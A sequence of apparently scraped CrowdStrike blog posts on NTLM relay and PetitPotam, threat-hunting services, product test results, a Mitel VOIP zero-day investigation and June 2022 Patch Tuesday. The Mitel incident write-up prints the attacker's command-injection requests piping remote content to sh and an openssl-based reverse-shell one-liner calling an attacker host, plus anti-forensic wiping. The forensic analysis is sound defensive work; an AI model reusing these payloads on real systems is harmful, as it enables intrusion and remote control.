Adversaries often exploit legacy protocols like Windows NTLM that unfortunately remain widely deployed despite known vulnerabilities. Previous CrowdStrike blog posts have covered critical vulnerabilities in NTLM that allow remote code execution and other NTLM attacks where attackers could exploit vulnerabilities to bypass MIC (Message Integrity Code) protection, session signing and EPA (Enhanced Protection for Authentication)

The PetitPotam vulnerability, combined with AD-CS relay, is one of the recent severe NTLM relay variations the CrowdStrike Identity Protection research team have seen, which indicates its high popularity. While the latest Microsoft security update — released on Patch Tuesday, May 10, 2022 — included a patch for the aforementioned vulnerability, it does not fully mitigate the issue. It does, however, change the requirements from being able to run the attack unauthenticated, to requiring any Active Directory account credentials to trigger the attack. 

In this blog, we detail the fix, the remaining issues and an enhancement to Falcon Identity Protection’s existing NTLM relay detection, which detects exploitation of the PetitPotam vulnerability and similar authentication coercion techniques.  

PetitPotam and NTLM Relay

NTLM relay has always been a popular attack technique. In the past, the biggest challenge was to solicit a user account to authenticate to an attacker-controlled machine; now it seems that endpoint authentication coercion mechanisms are gaining popularity. 

The most popular targets, for obvious reasons, are domain controllers, as their high privileges make them a lucrative target for authentication relay attacks. The first authentication coercion mechanism involved the Print Spooler service, while the newer one relies on the MS-EFSRPC protocol. The latter is also known as the PetitPotam attack. When combined with the insecure default configuration of the Active Directory Certificate Services (AD-CS), which does not enforce Extended Protection for Authentication (EPA), it could be deadly as it can lead to a full domain compromise in a few steps. An attacker could trigger a domain controller authentication by exploiting the PetitPotam vulnerability and relaying it to the AD-CS server to request a certificate for the domain controller account. Using this certificate, a malicious actor can then retrieve a TGT for the relayed domain controller account and perform any further operations using its high privileges (e.g., dump domain admin hashes). 

One of the most severe issues with the PetitPotam vulnerability, prior to Microsoft’s latest security updates, was that an attacker could run the attack unauthenticated (i.e., only network access to the domain controller was required). The patch only partially mitigates the issue, meaning an attack is still possible.

The Released Fix(es) and Remaining Issues

The Microsoft security update released on Patch Tuesday, May 10, 2022, included a partial patch for the PetitPotam vulnerability. This update, however, also caused authentication failures for various Windows services such as Network Policy Server (NPS), Routing and Remote Access Service (RRAS), Radius, Extensible Authentication Protocol (EAP) and Protected Extensible Authentication Protocol (PEAP). According to Microsoft, “An issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller.” 

As a workaround, Microsoft recommended to manually map certificates to Active Directory accounts or follow KB5014754 for other possible mitigations. Because of the issues caused by the patch, CISA warned against deploying it on domain controllers, which left many organizations wide open to the unauthenticated PetitPotam authentication coercion attack. On May 19, 2022, an out-of-band update was made available to fix the authentication failures caused by the latest security update.

It is important to note that the security update states, “This security update detects anonymous connection attempts in LSARPC and disallows it,” which leaves the question: Does the coercion attack still work using an authenticated user?

Following some testing, it looks like the answer is yes!

While the PetitPotam vulnerability, when patched, will no longer work unauthenticated, it can still be abused by leveraging any Active Directory account credentials to trigger domain controller NTLM authentication, which can be relayed to a escalate to domain admin privileges if the required security settings are not enforced (as previously mentioned, EPA is not enforced by default on AD-CS servers).

Moreover, PetitPotam is no longer the newest authentication coercion method; the attack tool DFSCoerce, which abuses the MS-DFSNM protocol to trigger domain controller authentication, has since been released. 

Enhancing CrowdStrike Identity Protection NTLM Relay Detection

Because an authenticated user can still trigger an NTLM authentication from the domain controller, the NTLM relay attack vector remains relevant for domain controller accounts. This is why the NTLM relay detection capability of CrowdStrike Falcon Identity Threat Protection was enhanced to detect attempts to perform NTLM relay using domain controller credentials. The benefit of this detection is that it is not tied to any single authentication coercion method, but will detect a relay attack no matter if it is initiated by the PetitPotam vulnerability, the newer DFSCoerce tool or any coercion mechanism discovered in the future.

(Click to enlarge)

Watch this video on Falcon Spotlight™ to see how you can monitor and prioritize NTLM relay issues and other vulnerabilities within your environment, and this video to learn how Falcon Identity Threat Protection  helps ensure comprehensive protection against identity-based attacks in real time.

Additional Mitigations

Though patching is an important first step against the latest NTLM relay vulnerabilities, it is not enough, as many unsecured defaults can leave your domain vulnerable. This is why we recommend following these steps:

  1. Enforce Signing (SMB/LDAP) and Extended Protection for Authentication (EPA) for all relevant servers, especially the AD-CS servers, which are a common target of this attack.
  2. Track any failed/successful NTLM relay attempts performed in your domain network. Using the enhanced detection capabilities of the CrowdStrike Falcon Identity Threat Protection, customers can now be alerted on NTLM relay attacks abusing domain controller accounts.
  3. Disable NTLM. Because this is a potentially breaking change that requires a lot of time in most environments, start by disabling NTLM support on servers that may be targeted during a relay attack and are not sufficiently protected. For example, if for any reason you are unable to enforce EPA on the AD-CS server, disable incoming NTLM on that server to protect it from NTLM relay attacks.

Additional Resources

  • Learn more about popular attack techniques at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • Learn how CrowdStrike Falcon Identity Protection reduces costs and risks across the enterprise by protecting workforce identities.
  • Watch this video to see how Falcon Identity Threat Protection detects and stops ransomware attacks.
  • Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV performs against today’s most sophisticated threats.

Falcon OverWatch Elite in Action: Tailored Threat Hunting Services Provide Individualized Care and Support

29 June 2022 at 18:35

The threat presented by today’s adversaries is as pervasive as it is dangerous — eCrime and state-nexus actors alike are attempting to infiltrate companies and organizations of all sizes and across all verticals. 

While technology is a powerful tool for performing routine or repeatable analysis, the only way to effectively hunt and contain sophisticated and determined cyber threat actors is to use the expertise and ingenuity of human threat hunters.

The Telescope and the Microscope: Two Sides of the Threat Hunting Coin 

Threat hunting is an ever-evolving discipline that proactively tracks changes in adversaries’ behavior. It requires a broad awareness of the threat landscape — the telescopic view — and can be augmented by a deeper understanding of a customer’s pain points or areas of identified risk — the microscopic view. The most comprehensive threat hunting leverages both the telescopic and microscopic viewpoints, blending the insights gained from both perspectives to safeguard a customer’s assets from threats.

The CrowdStrike Falcon OverWatch™ team’s continuous hunting operations are driven by a world-class team of dedicated in-house threat hunters — individuals who are relentlessly committed to honing their craft and dedicated to the mission of stopping breaches. OverWatch analysts track the most stealthy and persistent hands-on-keyboard campaigns, actively hunting for that last 1% of malicious activity deliberately seeking to subvert technology-based controls. 

Using patented hunting tools, OverWatch hunters leverage the power of the CrowdStrike Security Cloud to hunt across in excess of one trillion events a day — proactively searching for that malicious activity designed to blend in with the benign. Given the sheer breadth of information available to them, OverWatch analysts are skilled at identifying even the faintest signs of activity indicative of threat actor behavior and emerging threats, enabling customers to rapidly disrupt malicious behavior before its impact is felt.

The Power of Elite Tailored Threat Hunting

For organizations that are looking for an active partnership with their hunters, CrowdStrike offers OverWatch Elite — the personalized customer engagement add-on for  CrowdStrike’s Falcon OverWatch managed threat hunting service. 

OverWatch Elite builds on the continuous 24/7 human-led threat hunting provided by OverWatch, leveraging the ability to hunt across global telemetry to address areas of concern identified by customers. OverWatch Elite customers have access to an assigned threat analyst who provides a range of services to drive improved maturity across a customer’s internal security team. These services include expert coaching to support any in-house hunting efforts, regular threat updates, and a dedicated line of communication to address any queries or concerns as they arise. In partnership with their assigned analyst, customers can develop, operationalize and tune their threat hunting programs to ensure that supplementary threat hunts are tailored to their needs.

OverWatch Elite analysts build close partnerships with their assigned customers to develop a shared understanding of an organization’s unique structure and requirements. OverWatch Elite analysts are then able to tune their tools to the particular nuances found within a customer’s environment. In addition to addressing the customer’s needs, this fine-tuning enables all OverWatch analysts to more easily identify hands-on-keyboard activity and respond promptly to potential threats. 

The fast, closed-loop communication between customers and the OverWatch Elite team allows for greater collaboration to address  issues. Whether a customer has seen the news about a recent vulnerability or read an intelligence report about certain threat actors targeting companies in their sector, assigned analysts are available to listen and respond to these concerns by performing threat hunts tailored to address them. 

Working Better Together

It is important to recognize that these two parts of OverWatch share a common mission: stopping breaches. OverWatch and OverWatch Elite analysts work hand-in-hand daily to ensure all customers are protected against those malicious hands-on-keyboard activities designed to evade detection. All teams under the OverWatch umbrella work together continuously to provide the best customer service possible. 

OverWatch Elite Manager Gareth Willams puts it best: “You can’t look at the moon with a microscope and you can’t use a telescope to see small objects, but both give you a great field of vision.” 

In addition to tailored threat hunting services, OverWatch Elite offers several additional  features that truly make this a customer engagement-centric managed threat hunting service. Additional offerings include 60-minute call escalation for critical threats, which provides OverWatch Elite customers added peace of mind when it comes to rapidly disrupting adversary activity within their environments. OverWatch Elite customers are also invited to a private Slack channel where they can reach an OverWatch Elite analyst to respond with speed and confidence.

For more information, please visit OverWatch Elite’s page on CrowdStrike’s website.

Additional Resources

CrowdStrike Falcon Pro for Mac Achieves 100% Mac Malware Protection, Wins Fifth AV-Comparatives Approved Mac Security Product Award

28 June 2022 at 07:28
  • CrowdStrike Falcon Pro for Mac achieved 100% Mac malware protection in the May 2022 AV-Comparatives Mac Security Test and Review 
  • CrowdStrike Falcon Pro for Mac has now won five consecutive Approved Mac Security Product Awards from AV-Comparatives, one of the leading third-party independent organizations testing the efficacy of endpoint security solutions in protecting against malware
  • CrowdStrike Falcon Pro for Mac uses cloud-based and on-sensor machine learning to proactively protect against threats

CrowdStrike believes that continuous testing and evaluation by third-party organizations is critical in helping customers make informed decisions about which security solution best fits their needs. This is why CrowdStrike continues to participate in more third-party testing than any other next-gen endpoint cybersecurity vendor.

We’re proud to announce the results of the latest evaluation: CrowdStrike achieved the highest Mac malware protection score in the May 2022 AV-Comparatives Mac Security Test and Review, scoring 100% Mac malware protection with Falcon Pro for Mac. This marks the fifth consecutive time that CrowdStrike has won the Approved Security Product Award.

One of the leading third-party independent testing organizations, AV-Comparatives evaluated the efficacy of 10 endpoint security products in detecting 471 recent and representative malicious Mac samples collected during the first half of 2022. CrowdStrike Falcon Pro for Mac once again stood out against the competition, demonstrating the proactive capability to accurately detect and block new and unknown threats by using the power of cloud-based and on-sensor machine learning.

AV-Comparatives Testing Methodology

The Malware Protection Test part of the Mac Security Test and Review 2022 from AV-Comparatives assesses the efficacy of endpoint security vendors in detecting and protecting against recent macOS malware and threats that reflect the current threat landscape.

AV-Comparatives requires a high endpoint protection rate to win certification during the evaluation, as third-party endpoint security solutions for macOS are not always present. Because potential exposure to Mac malware could have serious consequences, it’s crucial that a security solution has high endpoint protection capabilities for the evaluation.

The Mac Security Test and Review 2022 also assessed endpoint detection capabilities for potentially unwanted applications (PUAs) for Mac, such as adware and bundled software that can disrupt system usability and performance. PUA testing also examined the ability to detect Windows malware on macOS, for while Windows malware is benign on macOS it may use Mac systems to reach Windows machines. The test involved 773 prevalent macOS PUA samples and 1,000 prevalent Windows malware samples.

How Falcon Pro for Mac Performed During Testing 

Falcon Pro for Mac uses a layered approach to protect endpoints from new and unknown malware and threats by employing both on-sensor and in-the-cloud machine learning capabilities coupled with behavior-based malware detection

Throughout the Malware Protection Test, the CrowdStrike Falcon® sensor achieved 100% protection against all Mac malware samples, with zero misses on detecting macOS malware and threats that reflect the current threat landscape. Falcon Pro for Mac demonstrated excellent capability in instantly protecting endpoints from new and unknown malware as soon as it touched the system. 

While PUAs are not malicious per se, and Windows malware doesn’t execute on macOS — it’s completely inert — Falcon Pro for Mac detected 98% of Mac PUAs and 84% of Windows PUAs on macOS.

Fifth AV-Comparatives Approved Mac Security Product Award 

CrowdStrike remains committed to participating in independent tests from leading third-party organizations. The recent AV-Comparatives Approved Mac Security Product Award demonstrates our consistent excellent performance in protecting endpoints from macOS malware and threats and our ability to achieve public testing parity in protecting from both Windows and Mac malware and threats.

Winning the fifth consecutive Mac Security Product award from AV-Comparatives highlights the power of the Falcon platform in delivering machine learning-powered and layered endpoint security to drive continued leadership in protecting macOS systems.

Additional Resources

CrowdStrike Tops IDC Worldwide Corporate Endpoint Security Market Shares, 2021

23 June 2022 at 14:44

CrowdStrike is proud to be ranked No. 1 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report (doc #US48580022, May 2022). We are grateful to our customers and partners for helping us achieve this significant milestone, yet its real value goes far beyond the bottom line. Our conviction is that the only way to stop modern adversaries is by using a best-in-class platform that leverages native artificial intelligence (AI), machine learning (ML) and automation to harness the power of high-fidelity data and front-line human expertise. 

Rich telemetry and threat intelligence form the foundation of nearly everything CrowdStrike does. It trains our AI and ML algorithms to make hyper-accurate decisions, gives our threat hunters and incident responders the context they need to root out and contain active attacks, informs intelligent automation across our platform, and empowers SecOps professionals with the visibility to simplify and accelerate detection, investigation and response workflows across their environment.

Unifying AI and Human Expertise to Stop Adversaries

Some AI experts argue that general purpose methods such as search and learning that leverage ever-increasing training sets and computing power are what primarily drive how machines can solve the most complex problems (e.g., beating an expert in the game of Go). You can think of this approach as teaching the algorithm how to think and learn (like a toddler learning how to play the game by watching their friends and then trying over and over until they get it right) rather than putting specific knowledge into it (like the same toddler being told over 200 possible moves and common strategies for gameplay and then left on their own to figure things out). 

Others would argue that simply adding more raw data and computing power isn’t enough, as human knowledge is critical to achieving a specific outcome (and to reducing the carbon footprint from unlimited computing). 

While this debate is sure to continue, let’s examine how CrowdStrike holistically blends both approaches — supervised and unsupervised — to achieve cloud-scale AI that is enriched with human-led expertise to solve one of the hardest challenges in IT: counteracting a malicious human on the other side of the keyboard.

High-Fidelity Data Is the Bedrock of Analytics

Every good decision in cybersecurity starts with good data, which must come from sensors deployed holistically across the enterprise. The more weak signals you can integrate into a strong signal, the better your chances are of finding the attack that matters most, which is one of the core philosophies behind CrowdStrike Falcon XDR. According to the IDC report, we owned “12.6% corporate endpoint security market in 2021,” leapfrogging all other providers and delivering significant year-over-year growth. Our growth means we have evermore sensors in the most critical, highly targeted organizations, resulting in more high-fidelity data for analytics.

By the numbers, CrowdStrike Threat Graph® processes trillions of security events per day from nearly 18,000 customers around the world. One of the secrets of AI, and the Threat Graph itself, is how the value of data compounds over time. The more high quality data you have over an extended time horizon, the faster and more accurate decisions you can make. As we’ve been categorizing indicators of attack (IOAs) and tactics, techniques and procedures (TTPs) for over a decade, chances are we’ve already seen a particular malicious behavior or something like it. This allows us to predict the right response in near real time. Whether the response is a prevention event or investigating, hunting or running forensics across our vast data repository, it results in better prevention rates and faster time to containment for our customers.

AI-powered Analytics Is Key to Stay Ahead of Evolving Adversaries

Of course, raw data isn’t valuable without analytics. As we’ve seen throughout the long history of security information and event management (SIEM) systems, more data can often be overwhelming, requiring vast resources to ingest, store, manage and transform raw telemetry into actionable insights. SIEMs are often referred to as “garbage collectors” for data — garbage data in equals garbage data out.The last thing we need in cybersecurity is more noise. The key is gathering and integrating the right data to fuel analytics, which never means all data.

Across the CrowdStrike Falcon® platform, we employ multiple complementary layers of AI/ML to our rich dataset to deliver accurate results, including our continuously learning malware prevention capabilities on the endpoint that can stop never-before-seen threats before they result in a breach. Additionally, with Falcon XDR, we apply analytics across disparate sources of security telemetry to surface hidden threats that could bypass traditional single-point detection tools. 

Another critical area of focus for analytics is the quality of the security analyst experience. CrowdStrike constantly finds ways to inject analytics into our platform to make the job of detecting, investigating and responding to events simpler and more effective. For instance, no analyst intervention is needed to build the complete visualization of an adversary’s complex attack path, saving hours and greatly reducing mean time to detect/mean time to respond (MTTD/MTTR); think of this like “autocomplete” in your email. 

CrowdStrike will continue to drive new innovations in the Falcon platform to take the hands-on grunt work out of security operations. One such example is the native integration of the CrowdStrike Falcon Fusion security orchestration and automation response (SOAR) solution into Falcon XDR, which allows analysts to focus on responding in a timely manner to the relatively few events that truly matter, the situations where responses can’t be fully automated.

Human-led Expertise Informs AI in a Virtuous Cycle

CrowdStrike is privileged to help our customers prepare, hunt, react to and recover from potential cyberattacks with the world’s best threat hunting and incident response (IR) team. From our fully managed Falcon Complete™ solution to threat hunting and IR, the experts behind these services constantly feed the results of their activities — be it a newly discovered malware family, IOAs or other adversary tactics — into the Threat Graph. CrowdStrike technology then automatically uses what our experts have learned to train our AI/ML models to detect and stop future attacks. The more hunting or frontline engagements we perform, the more tacit knowledge our platform retains. As our agents and services continue to be deployed across more enterprises and endpoints, we gain more visibility and discover and contain more threats, which turns into a flywheel that keeps CrowdStrike ahead of the most advanced adversaries.

Turning On the Flywheel to Stop Breaches

We believe that the trifecta for stopping breaches is to unify the world’s best platform, with the industry’s deepest data to power AI/ML and automation, all bolstered by elite human expertise. We’re proud to have been ranked No. 1 market share for 2021 in the IDC Worldwide Corporate Endpoint Security Market Shares, 2021 report, but we are even more excited about what this means for our customer as we continue to broaden our reach, creating a virtuous cycle that keeps adversaries on their heels.

Additional Resources

The Call Is Coming from Inside the House: CrowdStrike Identifies Novel Exploit in VOIP Appliance

23 June 2022 at 16:26
  • CrowdStrike Services recently performed an investigation that identified a compromised Mitel VOIP appliance as the threat actor’s entry point. 
  • The threat actor performed a novel remote code execution exploit on the Mitel appliance to gain initial access to the environment.
  • CrowdStrike identified and reported the vulnerability to Mitel, and CVE-2022-29499 was created.
  • The threat actor performed anti-forensic techniques on the VOIP appliance in an attempt to hide their activity.

Background

CrowdStrike Services recently investigated a suspected ransomware intrusion attempt. The intrusion was quickly stopped through the customer’s efforts and those of the CrowdStrike Falcon Complete™ managed detection and response (MDR) team, which was supporting this customer’s environment. CrowdStrike determined that all of the identified malicious activity had originated from an internal IP address associated with a device that did not have the CrowdStrike Falcon® sensor installed on it. Further investigation revealed that this source device was a Linux-based Mitel VOIP appliance sitting on the network perimeter; the availability of supported security or endpoint detection and response (EDR) software for these devices is highly limited. 

The device was taken offline and imaged for further analysis, leading to the discovery of a novel remote code execution exploit used by the threat actor to gain initial access to the environment. Thanks to close and immediate work with the Mitel product security incident response team (PSIRT) team, this was identified as a zero-day exploit and patched. The vulnerability was assigned CVE-2022-29499, and the associated security advisory can be found here.

Discovery and Anti-Forensic Techniques

After tracing threat actor activity to an IP address assigned to the Mitel MiVoice Connect VOIP appliance, CrowdStrike received a disk image of the Linux system and began analysis. CrowdStrike’s analysis identified anti-forensic techniques that were performed by the threat actor on the Mitel appliance in an attempt to hide their activity. Given the close proximity in time between the earliest and most recent dates of activity, it was likely that the threat actor attempted to wipe their activity on the Mitel appliance after Falcon Complete detected their activity and prevented them from moving laterally. 

Although the threat actor deleted all files from the VOIP device’s filesystem, CrowdStrike was able to recover forensic data from the device. This included the initial undocumented exploit used to compromise the device, the tools subsequently downloaded by the threat actor to the device, and even evidence of specific anti-forensic measures taken by the threat actor. 

Beyond removing files, the threat actor attempted to overwrite free space on the device. A recovered nohup.out file (generated by running a command via nohup) contained the following:

rm: cannot remove '/cf/swapfile': Operation not permitted
dd: error writing '/tmp/2': No space left on device
10666+0 records in
10665+0 records out
11183382528 bytes (11 GB) copied, 81.3694 s, 137 MB/s

The messages in the recovered file indicated two things. First, the error for the rm1 command failing to delete the swap file demonstrated that rm was used as part of the nohup command. The original rm command run via nohup was likely designed to delete all files, but failed on the swapfile due to it being active, resulting in the error message. 

Second, the threat actor used the dd2 command to attempt to create a file (/tmp/2) that, because of its size, would overwrite all of the free space on the device (and indeed did, based on the dd error message “No space left on device”). This anti-forensic measure would have been taken to prevent recovery of data deleted via the initial rm command. However, in this instance, /tmp was on a separate partition than that storing HTTP access logs. While the log files were also deleted via the rm command, the free space that contained their contents was not overwritten, allowing the file contents to be recovered. These recovered HTTP access logs included evidence of the exploit used to compromise the device.

Exploit Details

The exploit involved two GET requests. The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation. This first request was necessary because the actual vulnerable URL was restricted from receiving requests from external IP addresses. By first targeting the get_url parameter, the actual exploit request to the vulnerable page came from the local system.

Note that the threat actor IP addresses have been replaced with invalid IPs 1.1.256.1 and 2.2.256.2 below. The URL-encoded portion at the end of the request below decodes to $PWD|sh|?.

Request #1:

1.1.256.1 - - [01/Mar/2022:01:25:17 -TZ] "GET /scripts/vtest.php?get_url=http://127.0.0.1/ucbsync.php%3fcmd=syncfile:db_files/favicon.ico:2.2.256.2/%24%50%57%44%7c%73%68%7c%3f HTTP/1.1" 200 40

The second request included command injection that would cause the system to perform an HTTP GET request to attacker-controlled infrastructure, and then pipe the results of the request locally to sh.3 This would allow execution of whatever commands were stored on the attacker’s server at the requested URL. This vulnerability was caused by the PHP file in question splitting up the parameters for the syncfile command, one of which would subsequently be used by the appliance in a curl command. Because the request came from localhost — by first sending the request to the file with the get_url parameter — it was allowed. The request is shown below.

Request #2:

127.0.0.1 - - [01/Mar/2022:01:25:17 -TZ]  "GET /ucbsync.php?cmd=syncfile:db_files/favicon.ico:2.2.256.2/$PWD|sh|? HTTP/1.0" 200 -

In addition to recovering the logs, CrowdStrike recovered the contents of two outbound HTTP requests from the appliance to the attacker’s infrastructure. These outbound requests were both caused by the second request shown above. The responses to the outbound requests were also recovered, which demonstrated that the attacker used the exploit to create a reverse shell.

The first outbound request returned valid json related to the application to reach the vulnerable section of code.

Outbound request and response #1:

GET /$PWD|sh|?/ucbsync.php?cmd=manifest HTTP/1.1
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
{"db_files":[{"name":"exmaple0.jpg","size":55318,"date":000000000},{"name":"default_logo.jpg","size":4181,"date":0000000000},{"name":"favicon.ico","size":4364,"date":0000000000},{"name":"example1.jpg","size":73553,"date":0000000000},{"name":"example1.jpg","size":35299,"date":0000000000},{"name":"example2.jpg","size":58617,"date":0000000000},{"name":"default_banner.jpg","size":3148,"date":0000000000},{"name":"example2.jpg","size":63954,"date":0000000000},{"name":"example2.jpg","size":48666,"date":0000000000},{"name":"example3.jpg","size":65224,"date":0000000000},{"name":"example3.jpg","size":39322,"date":0000000000},{"name":"example4.jpg","size":34328,"date":0000000000},{"name":"example5.jpg","size":41095,"date":0000000000},{"name":"example6.jpg","size":43450,"date":0000000000},{"name":"example5.jpg","size":52095,"date":0000000000},{"name":"example7.jpg","size":8331,"date":0000000000}]}

The second outbound request showed the remote execution in action. The following recovered outbound GET request to /shoretel/wc2_deploy (hosted on the threat actor’s external infrastructure) included the payload in its response: an SSL-enabled reverse shell created via the mkfifo command and openssl s_client.

Outbound request and response #2:

GET //shoretel/wc2_deploy HTTP/1.1
User-Agent: curl/7.29.0
Host: 2.2.256.2
Accept: */*
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/3.8.10
Date: Tue, 01 Mar 2022 01:25:17 GMT
Content-type: text/html
 
mkfifo /tmp/.svc_bkp_1; /bin/sh -i < /tmp/.svc_bkp_1 2>&1 | openssl s_client -quiet -connect 2.2.256.2:443 > /tmp/.svc_bkp_1; rm /tmp/.svc_bkp_1

In other words, the threat actor had a webserver (via the Python SimpleHTTP module) running on infrastructure they controlled. On this webserver was a file named wc2_deploy that contained the mkfifo command shown above. Because the threat actor’s exploit request involved reaching out to this URL and piping the response to sh, this would cause the reverse shell command to be executed upon exploitation.

Leveraging first in, first out (FIFO) pipes is a common technique to create a reverse shell. Often, shells created in this manner will use netcat instead of openssl s_client, but the functionality is the same, except that openssl s_client will use ssl and netcat will typically be plaintext.

Post-Exploitation Activity

Once the reverse shell was established, the threat actor created what appeared to be a webshell named pdf_import.php. The contents of pdf_import.php were not recovered; however, it was not a standard file name for the device, and a recovered log file included a POST request to the file that originated from the same IP address that the exploit requests originated from.

1.1.256.1 - - [1/Mar/2022:06:36:04 -0500] "POST /vhelp/pdf/pdf_import.php HTTP/1.1" 200 2

The threat actor also downloaded the tunneling/proxy tool Chisel onto the VOIP appliance, renamed it memdump and executed it. This binary acted as a reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device. The execution of Chisel, as well as the POST request to pdf_import.php, both directly corresponded with malicious activity detected and blocked by Falcon Complete on internal devices, suggesting that the threat actor used both tools to attempt to move laterally into the environment.

Conclusion

Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant. That’s why it’s crucial to have multiple layers of defense, such as Falcon Complete MDR, which performs threat monitoring and remediation of malicious activity 24/7. Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via “one hop” from the compromised device. In particular, it’s critical to isolate and limit access to virtualization hosts or management servers such as ESXi and vCenter systems as much as possible. This can involve jump-boxes, network segmentation and/or multifactor authentication (MFA) requirements. 

Having an up-to-date and accurate asset inventory is also critically important, as you can’t protect something if you don’t know it exists. In addition, it’s important to ensure all service accounts are managed and accounted for, and that the capability exists to detect abnormal account usage. CrowdStrike Falcon Identity Protection can provide such insight by alerting on stale account usage as well as when accounts are associated with abnormal source or destination systems — and even forcing MFA challenges for users accessing critical assets.

Endnotes

  1. Linux command to remove files or directories
  2. Linux command to convert and copy files
  3. Linux command to spawn a shell or terminal prompt

Additional Resources

Capture the Flag: CrowdStrike Intelligence Adversary Quest 2022

16 June 2022 at 19:04

The Adversary Quest is back! From July 11 through July 25, 2022, the CrowdStrike Intelligence Advanced Research Team invites you to go head-to-head with three unique adversaries during our second annual Adversary Quest. Last year hundreds of Adversary Quest participants battled for the coveted CrowdStrike swag that was awarded to the top 50 high scorers. Now it’s your chance to defeat the adversary and win!

Register now and you will be able to track CATAPULT SPIDER (a ransomware adversary with a weird passion for a specific altcoin), PROTECTIVE PENGUIN (sentient Antarctic wildlife with offensive cybersecurity capabilities) and TABLOID JACKAL (a previously unknown adversary in disagreement with SPACE JACKAL’s preferences for source code indentation).

How to Play

The Adversary Quest will feature one track for each adversary, and each track will consist of four challenges. The tracks may include topics such as binary exploitation, reverse engineering, cryptography and OSINT research. The game is open to individual players (no teams) and designed to be an enjoyable experience for security enthusiasts of all skill levels.

During the game, you will need to find and submit flags that conform to the following format: CS{this_is_an_example}. If your finding doesn’t follow this format, you will need to keep searching. For each finding, you will get points that sum up to a total score.

The game is meant to be enjoyable for everyone, so please don’t attack the game’s infrastructure (e.g., the scoreboard or any service that is not obviously part of a challenge) and don’t share write-ups or spoilers before the game ends. After the game, we would love to see your solutions and write-ups online.

The formal terms of the event are at https://adversary.quest/tos. Like last year, the best players will be awarded some cool swag!

Timeline

  • Register now at https://adversary.quest/register
  • The event begins on July 11, 2022 at 17:00 UTC / 13:00 p.m. EDT / 10:00 a.m. PDT
  • The event ends on July 25, 2022 at 17:00 UTC / 13:00 p.m. EDT / 10:00 a.m. PDT

Contact

Email any questions about the event to [email protected]. We look forward to your participation!

Additional Resources

June 2022 Patch Tuesday: Three Critical CVEs and a Fix for the Follina Vulnerability

16 June 2022 at 18:29

Microsoft has released 55 security patches for its June 2022 Patch Tuesday rollout. Three of the 55 CVEs addressed are rated Critical severity, with CVE-2022-30136 having the highest CVSS score of 9.8. In this blog, the CrowdStrike Falcon Spotlight™ team offers an analysis of this month’s vulnerabilities, as well as insights into the vulnerabilities and patches affecting Microsoft products in the first half of this year. We highlight the CVEs in this month’s update that are most severe and recommend how to prioritize patching. Additionally, we discuss a much-anticipated patch for the Follina vulnerability (CVE-2022-30190). 

Official Fix for Windows MSDT Follina Zero-Day Vulnerability

Microsoft’s June 2022 patch update includes a fix for the widely exploited Windows Microsoft Diagnostic Tool (MSDT) zero-day vulnerability known as Follina. Last month, this Windows zero-day vulnerability was discovered in attacks that executed malicious PowerShell commands via MSDT. When it was first detected, the vulnerability bypassed all security protections, including Microsoft Office’s Protected View, and executed the PowerShell scripts when a user simply opened a Word document. A brief timeline on this vulnerability:

  • On May 27, 2022, a remote code execution vulnerability was reported affecting MSDT
  • The vulnerability, which is classified as a zero-day, can be invoked via weaponized Microsoft Office documents, Rich Text Format (RTF) files, XML files and HTML files
  • The CrowdStrike Falcon® platform protects customers from current Follina exploitation attempts using behavior-based indicators of attack (IOAs)
Rank CVSS Score CVE Description
Critical 7.8 CVE-2022-30190 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

CrowdStrike recommends that you monitor your environment to see if it is affected by this vulnerability and apply the fix offered. 

June 2022 Risk Analysis

The top three attack types — remote code execution (RCE), elevation of privilege and information disclosure — continue to dominate, with denial of service following at almost 6%.

Figure 1. Breakdown of June 2022 Patch Tuesday attack types

The affected product families, however, differ greatly from last month. In May 2022, Developer Tools — including Visual Studio Code, Visual Studio 2019 and 2022, and Microsoft .NET Framework — saw a significant decrease in vulnerabilities patched. Microsoft Windows received the most patches this month, with Extended Security Updates (ESU) following close behind. A single Microsoft Exchange update was also included in this month’s patching list.

Figure 2. Breakdown of June 2022 Patch Tuesday affected product families

Critical Vulnerabilities Affecting LDAP, NFS and Hyper-V

Three vulnerabilities ranked as Critical received patches this month. Affected products are Windows Lightweight Directory Access Protocol (LDAP), Windows Network File System (NFS) and Windows Hyper-V. Let’s review each of these vulnerabilities and how they could affect an organization’s environment. 

CVE-2022-30136: This Windows Network File System remote code execution vulnerability with a CVSS of 9.8 is very similar to CVE-2022-26937, a Network File System (NFS) CVE patched last month. This vulnerability could allow a remote attacker to execute privileged code on affected systems running NFS. On the surface, the only difference between the patches is that this month’s update fixes a flaw in NFSV4.1, whereas the flaws found last month only affected versions NSFV2.0 and NSFV3.0. Enterprises running NFS should prioritize testing and deploying this fix.

CVE-2022-30163: This Windows Hyper-V remote code execution vulnerability with a CVSS of 8.5 could allow a user on a Hyper-V guest to run their code on the underlying Hyper-V host OS. The update doesn’t list the privileges the attacker’s code would run at, but any guest-to-host escape should be taken seriously. Microsoft notes that attack complexity is high since an attacker would need to win a race condition.

CVE-2022-30139: This Windows Lightweight Directory Access Protocol (LDAP) remote code execution vulnerability with a CVSS of 7.5 is one of the seven LDAP vulnerabilities fixed this month. The volume of CVEs in LDAP over the last couple of months could indicate a broad attack surface in the component.

Rank CVSS Score CVE Description
Critical 9.8 CVE-2022-30136 Windows Network File System Remote Code Execution Vulnerability
Critical 8.5 CVE-2022-30163 Windows Hyper-V Remote Code Execution Vulnerability
Critical 7.5 CVE-2022-30139 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability

Additional Windows LDAP Remote Code Execution Bugs

